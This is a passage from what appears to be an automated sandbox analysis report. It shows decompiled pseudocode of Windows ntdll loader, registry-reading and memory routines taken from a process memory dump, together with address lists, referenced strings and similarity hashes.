											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E018D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x19b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x19b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E018E2280(_t92, 0x19b86cc);
															_t94 = E01999DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E018F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x19b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E018D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x19b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x19b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0190F380(_t136, 0x18a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E018E2280(_t108, 0x19b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E018F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01999D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E018DFFB0(_t118, _t156, 0x19b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01909A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x018d8799
0x018d879d
0x018d87a1
0x018d87a3
0x018d87a8
0x018d87c3
0x018d87c3
0x018d87c8
0x018d87d1
0x018d87d4
0x018d87d8
0x018d87e5
0x018d87ec
0x01929bfe
0x01929c00
0x01929c02
0x01929c08
0x01929c0d
0x01929c0f
0x01929c14
0x01929c2d
0x01929c32
0x01929c37
0x01929c3a
0x01929c3c
0x01929c42
0x01929c42
0x01929c3c
0x01929c02
0x018d87da
0x018d87df
0x018d87e3
0x00000000
0x00000000
0x018d87e3
0x018d87f2
0x00000000
0x018d87fb
0x018d87fd
0x018d87fe
0x018d880e
0x018d880f
0x018d8810
0x018d8814
0x018d881a
0x018d881c
0x018d881f
0x018d8821
0x018d8822
0x018d8824
0x018d8826
0x018d882c
0x018d882e
0x01929c48
0x01929c48
0x018d8834
0x018d8834
0x018d8837
0x00000000
0x00000000
0x018d8837
0x018d882e
0x018d883d
0x018d8840
0x018d8843
0x018d8846
0x018d8849
0x018d884c
0x018d884e
0x018d8850
0x018d8852
0x018d8854
0x018d8857
0x018d88b4
0x018d88b6
0x018d88b6
0x018d8859
0x018d8859
0x018d8859
0x018d8861
0x018d8866
0x018d886a
0x018d893d
0x018d8941
0x00000000
0x018d8947
0x018d8947
0x018d894a
0x018d894c
0x00000000
0x018d8952
0x018d8955
0x018d895a
0x018d895d
0x018d895d
0x018d895f
0x018d8961
0x018d8961
0x018d8968
0x00000000
0x00000000
0x018d896a
0x018d896b
0x018d896e
0x00000000
0x018d8970
0x018d8970
0x018d8970
0x018d8970
0x018d8972
0x018d8972
0x018d8974
0x00000000
0x018d897a
0x018d897a
0x018d897d
0x00000000
0x018d8983
0x01929c65
0x01929c6d
0x01929c72
0x01929c75
0x01929c75
0x01929c82
0x01929c86
0x01929c87
0x01929c88
0x01929c89
0x01929c8c
0x01929c90
0x01929c95
0x01929c97
0x01929ca0
0x01929ca3
0x01929ca9
0x01929ca9
0x00000000
0x01929ca9
0x01929ca3
0x00000000
0x01929c97
0x018d897d
0x00000000
0x018d8974
0x018d8988
0x018d8992
0x018d8996
0x00000000
0x018d8996
0x018d894c
0x00000000
0x018d8870
0x018d887b
0x018d887d
0x018d887f
0x018d8881
0x018d8884
0x018d8884
0x018d8886
0x018d8889
0x018d888c
0x018d888e
0x018d8891
0x018d8891
0x018d8898
0x00000000
0x00000000
0x018d889a
0x018d889b
0x018d889e
0x00000000
0x00000000
0x018d88a0
0x018d88a8
0x018d88b0
0x018d88b2
0x018d88d3
0x018d88d5
0x00000000
0x018d88d7
0x018d88db
0x018d88dc
0x018d88e0
0x018d88e8
0x018d88ee
0x018d88f0
0x018d88f3
0x018d88fc
0x018d8901
0x018d8906
0x018d890c
0x018d890c
0x018d890f
0x018d8916
0x018d8917
0x018d8918
0x018d8919
0x018d891a
0x018d891f
0x018d8921
0x01929c52
0x01929c55
0x01929c5b
0x01929cac
0x01929cc0
0x01929cc0
0x01929c55
0x018d8927
0x018d8927
0x018d892f
0x018d8933
0x00000000
0x018d88f5
0x018d88f5
0x00000000
0x018d88f7
0x018d88f7
0x018d88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x018d88fa
0x018d88f5
0x018d88f3
0x00000000
0x018d88d5
0x00000000
0x018d88b2
0x018d88c9
0x00000000
0x018d88c9
0x018d887f
0x018d886a
0x018d8857
0x018d8852
0x018d88bf
0x018d88bf
0x018d87aa
0x018d87ad
0x018d87ae
0x018d87b4
0x018d87b5
0x018d87b6
0x018d87b8
0x018d87bd
0x018d87c1
0x018d87f4
0x018d87fa
0x00000000
0x00000000
0x00000000
0x018d87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01929C18
minkernel\ntdll\ldrsnap.c, xrefs: 01929C28
LdrpDoPostSnapWork, xrefs: 01929C1E

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 831f20624c3c66d0c57db4c77dfcfd1b173ec3a04c2fada35f01ea7ec0240dbd
Instruction ID: 1582eec890a0a874649ee1d6b3880f6ba8bc25f27e34b6adf4cc63d982a06e7f
Opcode Fuzzy Hash: 831f20624c3c66d0c57db4c77dfcfd1b173ec3a04c2fada35f01ea7ec0240dbd
Instruction Fuzzy Hash: D1910471A0031AEFEB18DF5DC4C1ABAB7B9FF46314B554169E909EB241DB30AB01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018D7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E018D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E018DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E018CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x19b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01945510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x19b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E018E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E018E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01947016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E018E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E018E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01947016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E018FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E018CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x018d7e4c
0x018d7e50
0x018d7e55
0x018d7e58
0x018d7e5d
0x018d7e71
0x018d7f33
0x018d7e77
0x018d7e77
0x018d7e79
0x018d7e79
0x018d7e7e
0x018d7f45
0x01929848
0x00000000
0x01929848
0x018d7f4e
0x018d7f53
0x018d7f5a
0x00000000
0x00000000
0x0192985a
0x01929862
0x01929866
0x00000000
0x0192986c
0x00000000
0x0192986c
0x018d7e84
0x018d7e84
0x018d7e8d
0x01929871
0x018d7eb8
0x018d7ec0
0x018d7ec0
0x018d7e9a
0x0192987e
0x00000000
0x00000000
0x01929884
0x0192988b
0x019298a7
0x019298ac
0x019298b1
0x019298b6
0x019298b8
0x019298b8
0x019298b9
0x00000000
0x019298b9
0x018d7ea0
0x018d7ea7
0x00000000
0x00000000
0x018d7eac
0x018d7eb1
0x018d7ec6
0x018d7ed0
0x019298cc
0x018d7ed6
0x018d7ed6
0x018d7ed6
0x018d7ede
0x018d7ee3
0x019298e3
0x019298f0
0x01929902
0x019298f2
0x019298fb
0x019298fb
0x01929907
0x0192991d
0x0192991d
0x01929907
0x019298e3
0x018d7ef0
0x018d7f14
0x018d7f14
0x018d7f1e
0x01929946
0x018d7f24
0x018d7f24
0x018d7f24
0x018d7f2c
0x0192996a
0x01929975
0x01929975
0x0192997e
0x01929993
0x01929993
0x0192997e
0x00000000
0x018d7ef2
0x018d7efc
0x018d7f0a
0x018d7f0e
0x01929933
0x00000000
0x01929933
0x00000000
0x018d7f0e
0x00000000
0x00000000
0x00000000
0x018d7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01929891
minkernel\ntdll\ldrmap.c, xrefs: 019298A2
LdrpCompleteMapModule, xrefs: 01929898

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 489a078f533ca1323ca4f7649a53373b2e7ebfef56f8d0b8688f4a55b6caa87b
Instruction ID: 36378adeba1b92ed83871981048670938c9a9fe3a4d8bf9b81654455190cdd59
Opcode Fuzzy Hash: 489a078f533ca1323ca4f7649a53373b2e7ebfef56f8d0b8688f4a55b6caa87b
Instruction Fuzzy Hash: 43511231600759DBE722CB6CC984B2A7BE4EB41B2CF040699EA55DB3D2C770EE00C791

Uniqueness

Uniqueness Score: -1.00%

Function 018CE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E018CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E018CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E019095D0();
						}
						if(_t78 != 0) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0190FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0190BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01909600();
					if(_t97 < 0) {
						goto L6;
					}
					E0190BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L018CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0190BB40(_t83, _t102 + 0x24, _t78);
								if(L018D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0190BB40(_t84, _t102 + 0x24, _t94);
									if(L018D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x018ce620
0x018ce628
0x018ce62f
0x018ce631
0x018ce635
0x018ce637
0x018ce63e
0x01925503
0x01925503
0x018ce64c
0x018ce64c
0x018ce651
0x00000000
0x00000000
0x018ce661
0x018ce665
0x0192542a
0x018ce715
0x018ce71a
0x018ce71c
0x018ce720
0x018ce720
0x018ce727
0x018ce736
0x018ce736
0x018ce743
0x018ce743
0x018ce673
0x018ce678
0x018ce67d
0x018ce682
0x018ce685
0x018ce692
0x018ce69b
0x018ce6a3
0x018ce6ad
0x018ce6b1
0x018ce6b2
0x018ce6bb
0x018ce6bf
0x018ce6c0
0x018ce6c8
0x018ce6cc
0x018ce6d5
0x018ce6d9
0x00000000
0x00000000
0x018ce6e5
0x018ce6ea
0x018ce6f9
0x018ce70b
0x018ce70f
0x01925439
0x0192545e
0x0192545e
0x00000000
0x0192545e
0x0192543b
0x0192543e
0x01925440
0x01925445
0x01925472
0x01925475
0x0192548d
0x01925493
0x019254a9
0x00000000
0x00000000
0x019254ab
0x019254b4
0x019254bc
0x019254c8
0x019254de
0x019254fb
0x019254e0
0x019254e6
0x019254eb
0x019254eb
0x019254de
0x00000000
0x019254bc
0x01925477
0x0192547a
0x01925480
0x01925483
0x01925486
0x0192548b
0x00000000
0x00000000
0x00000000
0x0192548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01925447
0x01925447
0x01925447
0x01925447
0x0192544e
0x00000000
0x00000000
0x01925450
0x01925452
0x01925455
0x0192545a
0x00000000
0x00000000
0x00000000
0x0192545c
0x0192546a
0x0192546d
0x0192546f
0x00000000
0x0192546f
0x018ce70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 018CE68C
InstallLanguageFallback, xrefs: 018CE6DB
@, xrefs: 018CE6C0

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 8c83a0a860510f8b670aefbaadc0bacd58111a2c88bdbeb952d402d9197660e0
Instruction ID: 2c266e07e86fc8ddec9babe0c87d7c2a92335651ab7abd906727b95f39cb14b3
Opcode Fuzzy Hash: 8c83a0a860510f8b670aefbaadc0bacd58111a2c88bdbeb952d402d9197660e0
Instruction Fuzzy Hash: 7351C5765083569BE715DF28C440AABB7ECBF88B15F05092EFA89D7240F734DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0198E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0198E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0198BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0198BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0198AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01909730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0198A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0198A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01909730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0198A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0198A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E018E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E018DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E018DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E018E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0197FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0198e547
0x0198e549
0x0198e54f
0x0198e553
0x0198e557
0x0198e55a
0x0198e55c
0x0198e55f
0x0198e561
0x0198e567
0x0198e56b
0x0198e7e2
0x00000000
0x0198e571
0x0198e575
0x0198e577
0x0198e57b
0x0198e57c
0x0198e57d
0x0198e57e
0x0198e57f
0x0198e588
0x0198e58f
0x0198e591
0x0198e592
0x0198e592
0x0198e596
0x0198e59e
0x0198e5a0
0x0198e5a6
0x0198e61d
0x0198e61d
0x0198e621
0x0198e623
0x0198e630
0x0198e630
0x0198e7e6
0x0198e7eb
0x0198e7ed
0x0198e7f4
0x0198e7fa
0x0198e7ff
0x0198e7ff
0x0198e80a
0x0198e812
0x0198e812
0x0198e5ab
0x0198e5b4
0x0198e5b9
0x0198e5be
0x0198e5c0
0x0198e5c2
0x0198e5c8
0x0198e5c9
0x0198e5cb
0x0198e5cc
0x0198e5d5
0x0198e5e4
0x0198e5f1
0x0198e5f8
0x0198e5f8
0x0198e5d5
0x0198e602
0x0198e616
0x0198e63d
0x0198e644
0x0198e64d
0x0198e652
0x0198e657
0x0198e659
0x0198e65b
0x0198e661
0x0198e662
0x0198e664
0x0198e665
0x0198e66e
0x0198e67d
0x0198e68a
0x0198e691
0x0198e691
0x0198e66e
0x0198e6b0
0x00000000
0x0198e6b6
0x0198e6bd
0x0198e6c7
0x0198e6d7
0x0198e6d9
0x0198e6db
0x0198e6de
0x0198e6e3
0x0198e6f3
0x0198e6fc
0x0198e700
0x0198e700
0x0198e704
0x0198e70a
0x0198e70a
0x0198e713
0x0198e716
0x0198e719
0x0198e720
0x0198e761
0x0198e76b
0x0198e774
0x0198e77a
0x0198e77a
0x0198e78a
0x0198e791
0x0198e799
0x0198e79b
0x0198e79f
0x0198e7aa
0x0198e7c0
0x0198e7ac
0x0198e7b2
0x0198e7b9
0x0198e7b9
0x0198e7c7
0x0198e806
0x00000000
0x0198e7c9
0x0198e7d1
0x0198e7d8
0x00000000
0x0198e7d8
0x00000000
0x00000000
0x0198e722
0x0198e72e
0x0198e748
0x0198e74c
0x0198e754
0x0198e756
0x0198e75c
0x0198e75c
0x00000000
0x0198e75c
0x0198e758
0x0198e758
0x00000000
0x0198e758
0x0198e750
0x00000000
0x00000000
0x0198e752
0x00000000
0x0198e752
0x0198e730
0x0198e735
0x0198e73d
0x0198e73f
0x00000000
0x00000000
0x0198e741
0x0198e741
0x00000000
0x0198e741
0x0198e739
0x00000000
0x00000000
0x0198e73b
0x00000000
0x0198e73b
0x0198e722
0x0198e720
0x0198e6b0
0x0198e618
0x00000000
0x0198e618

Strings

`, xrefs: 0198E670
`, xrefs: 0198E5D7

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: b2d208d74e17a1ccdcf49f80ee245b5d8faaa14fa7fd4b98a29950d3cd2e2fef
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
